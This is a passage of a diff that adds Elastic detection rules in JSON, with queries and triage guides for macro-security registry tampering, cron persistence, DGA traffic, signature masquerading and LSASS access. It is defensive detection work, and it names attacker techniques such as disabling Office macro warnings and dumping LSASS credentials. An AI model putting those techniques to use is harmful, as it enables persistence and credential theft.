not\n (process.code_signature.subject_name == \"GitHub, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* Notion */\n (process.name : \"*notion*.exe\" and not\n (process.code_signature.subject_name == \"Notion Labs, Inc.\" and process.code_signature.trusted == true)\n )\n )\n", + "references": [ + "https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "feafdc51-c575-4ed2-89dd-8e20badc2d6c", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "Data Source: Elastic Defend", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Initial Access", + "Tactic: Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + }, + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1189", + "name": "Drive-by Compromise", + "reference": "https://attack.mitre.org/techniques/T1189/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "feafdc51-c575-4ed2-89dd-8e20badc2d6c_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_107.json b/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_107.json new file mode 100644 index 00000000000..50cf192d30f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_107.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Microsoft Office Products offer options for users and developers to control the security settings for running and using Macros. Adversaries may abuse these security settings to modify the default behavior of the Office Application to trust future macros and/or disable security warnings, which could increase their chances of establishing persistence.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "MS Office Macro Security Registry Modifications", + "note": "## Triage and analysis\n\n### Investigating MS Office Macro Security Registry Modifications\n\nMacros are small programs that are used to automate repetitive tasks in Microsoft Office applications. Historically, macros have been used for a variety of reasons -- from automating part of a job, to building entire processes and data flows. Macros are written in Visual Basic for Applications (VBA) and are saved as part of Microsoft Office files.\n\nMacros are often created for legitimate reasons, but they can also be written by attackers to gain access, harm a system, or bypass other security controls such as application allow listing. In fact, exploitation from malicious macros is one of the top ways that organizations are compromised today. These attacks are often conducted through phishing or spear phishing campaigns.\n\nAttackers can convince victims to modify Microsoft Office security settings, so their macros are trusted by default and no warnings are displayed when they are executed. These settings include:\n\n- *Trust access to the VBA project object model* - When enabled, Microsoft Office will trust all macros and run any code without showing a security warning or requiring user permission.\n- *VbaWarnings* - When set to 1, Microsoft Office will trust all macros and run any code without showing a security warning or requiring user permission.\n\nThis rule looks for registry changes affecting the conditions above.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user and check if the change was done manually.\n- Verify whether malicious macros were executed after the registry change.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve recently executed Office documents and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Reset the registry key value.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Explore using GPOs to manage security settings for Microsoft Office macros.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKU\\\\S-1-5-21-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\AccessVBOM\",\n \"HKU\\\\S-1-5-21-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\VbaWarnings\",\n \"HKU\\\\S-1-12-1-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\AccessVBOM\",\n \"HKU\\\\S-1-12-1-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\VbaWarnings\",\n \"\\\\REGISTRY\\\\USER\\\\S-1-5-21-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\AccessVBOM\",\n \"\\\\REGISTRY\\\\USER\\\\S-1-5-21-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\VbaWarnings\",\n \"\\\\REGISTRY\\\\USER\\\\S-1-12-1-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\AccessVBOM\",\n \"\\\\REGISTRY\\\\USER\\\\S-1-12-1-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\VbaWarnings\"\n ) and\n registry.data.strings : (\"0x00000001\", \"1\") and\n process.name : (\"cscript.exe\", \"wscript.exe\", \"mshta.exe\", \"mshta.exe\", \"winword.exe\", \"excel.exe\")\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "feeed87c-5e95-4339-aef1-47fd79bcfbe3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "feeed87c-5e95-4339-aef1-47fd79bcfbe3_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff0d807d-869b-4a0d-a493-52bc46d2f1b1_3.json b/packages/security_detection_engine/kibana/security_rule/ff0d807d-869b-4a0d-a493-52bc46d2f1b1_3.json new file mode 100644 index 00000000000..c41dcf07e1d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ff0d807d-869b-4a0d-a493-52bc46d2f1b1_3.json @@ -0,0 +1,64 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A population analysis machine learning job detected potential DGA (domain generation algorithm) activity. Such activity is often used by malware command and control (C2) channels. This machine learning job looks for a source IP address making DNS requests that have an aggregate high probability of being DGA activity.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "dga_high_sum_probability", + "name": "Potential DGA Activity", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/dga", + "https://www.elastic.co/security-labs/detect-domain-generation-algorithm-activity-with-new-kibana-integration" + ], + "related_integrations": [ + { + "package": "dga", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "risk_score": 21, + "rule_id": "ff0d807d-869b-4a0d-a493-52bc46d2f1b1", + "setup": "## Setup\n\nThe rule requires the Domain Generation Algorithm (DGA) Detection integration assets to be installed, as well as DNS events collected by integrations such as Elastic Defend, Network Packet Capture, or Packetbeat. \n\n### DGA Detection Setup\nThe DGA Detection integration consists of an ML-based framework to detect DGA activity in DNS events.\n\n#### Prerequisite Requirements:\n- Fleet is required for DGA Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- DNS events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint), [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration, or [Packetbeat](https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n- To set up and run Packetbeat, follow [this](https://www.elastic.co/guide/en/beats/packetbeat/current/setting-up-and-running.html) guide.\n\n#### The following steps should be executed to install assets associated with the DGA Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Domain Generation Algorithm Detection and select the integration to see more details about it.\n- Under Settings, click Install Domain Generation Algorithm Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich DNS events with predictions from the Supervised DGA Detection model. This is done via the ingest pipeline named `-ml_dga_ingest_pipeline` installed with the DGA Detection package.\n- If using an Elastic Beat such as Packetbeat, add the DGA ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `packetbeat.yml`.\n- If adding the DGA ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the DGA ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"ml_is_dga\": {\n \"properties\": {\n \"malicious_prediction\": {\n \"type\": \"long\"\n },\n \"malicious_probability\": {\n \"type\": \"float\"\n }\n }\n }\n }\n}\n```\n\n### Anomaly Detection Setup\nBefore you can enable this rule, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched DNS events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `logs-network_traffic.*` if you used Network Packet Capture.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/dga/kibana/ml_module/dga-ml.json) configuration file, you will see a card for DGA under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Use Case: Domain Generation Algorithm Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1568", + "name": "Dynamic Resolution", + "reference": "https://attack.mitre.org/techniques/T1568/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "ff0d807d-869b-4a0d-a493-52bc46d2f1b1_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_9.json b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_9.json new file mode 100644 index 00000000000..add59f0b981 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_9.json @@ -0,0 +1,157 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Linux cron jobs are scheduled tasks that can be leveraged by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Cron Job Created or Changed by Previously Unknown Process", + "new_terms_fields": [ + "host.id", + "file.path", + "process.executable" + ], + "note": "## Triage and analysis\n\n### Investigating Cron Job Created or Changed by Previously Unknown Process\nLinux cron jobs are scheduled tasks that run at specified intervals or times, managed by the cron daemon. \n\nBy creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities.\n\nThis rule monitors the creation of previously unknown cron jobs by monitoring for file creation events in the most common cron job task location directories.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the cron job file that was created or modified.\n- Investigate whether any other files in any of the available cron job directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\n path LIKE '/etc/cron.allow.d/%' OR\\n path LIKE '/etc/cron.d/%' OR\\n path LIKE '/etc/cron.hourly/%' OR\\n path LIKE '/etc/cron.daily/%' OR\\n path LIKE '/etc/cron.weekly/%' OR\\n path LIKE '/etc/cron.monthly/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (\\n path = '/etc/cron.allow' OR\\n path = '/etc/cron.deny' OR\\n path = '/etc/crontab' OR\\n path = '/usr/sbin/cron' OR\\n path = '/usr/sbin/anacron'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\n path LIKE '/etc/cron.allow.d/%' OR\\n path LIKE '/etc/cron.d/%' OR\\n path LIKE '/etc/cron.hourly/%' OR\\n path LIKE '/etc/cron.daily/%' OR\\n path LIKE '/etc/cron.weekly/%' OR\\n path LIKE '/etc/cron.monthly/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses cron jobs for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f\n- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b\n- New Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c\n- New Systemd Service Created by Previously Unknown Process - 17b0a495-4d9f-414c-8ad0-92f018b8e001\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type : \"linux\" and event.action : (\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and \nfile.path : (/etc/cron.allow or /etc/cron.deny or /etc/cron.d/* or /etc/cron.hourly/* or /etc/cron.daily/* or \n/etc/cron.weekly/* or /etc/cron.monthly/* or /etc/crontab or /usr/sbin/cron or /usr/sbin/anacron) \nand not (\n (process.name : (\"dpkg\" or \"dockerd\" or \"rpm\" or \"snapd\" or \"yum\" or \"exe\" or \"dnf\" or \"podman\" or \n \"dnf-automatic\" or puppet or autossl_check )) or \n (file.extension : (\"swp\" or \"swpx\")) or \n (process.name : \"sed\" and file.name : sed*) or \n (process.name : \"perl\" and file.name : e2scrub_all.tmp*) or\n (process.executable : /var/lib/dpkg*)\n)\n", + "references": [ + "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ff10d4d8-fea7-422d-afb1-e5a2702369a9", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 9 + }, + "id": "ff10d4d8-fea7-422d-afb1-e5a2702369a9_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_7.json b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_7.json new file mode 100644 index 00000000000..c0c105eaae2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_7.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies access attempts to the LSASS handle, which may indicate an attempt to dump credentials from LSASS memory.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.api-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "LSASS Process Access via Windows API", + "note": "## Triage and analysis\n\n### Investigating LSASS Process Access via Windows API\n\nThe Local Security Authority Subsystem Service (LSASS) is a critical Windows component responsible for managing user authentication and security policies. Adversaries may attempt to access the LSASS handle to dump credentials from its memory, which can be used for lateral movement and privilege escalation.\n\nThis rule identifies attempts to access LSASS by monitoring for specific API calls (OpenProcess, OpenThread) targeting the \"lsass.exe\" process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) of the process that accessed the LSASS handle.\n - Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Determine the first time the process executable was seen in the environment and if this behavior happened in the past.\n - Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n - Investigate any abnormal behavior by the subject process, such as network connections, DLLs loaded, registry or file modifications, and any spawned child processes.\n- Assess the access rights (`process.Ext.api.parameters.desired_access`field) requested by the process. This [Microsoft documentation](https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights) may be useful to help the interpretation.\n- If there are traces of LSASS memory being successfully dumped, investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executables of the processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, 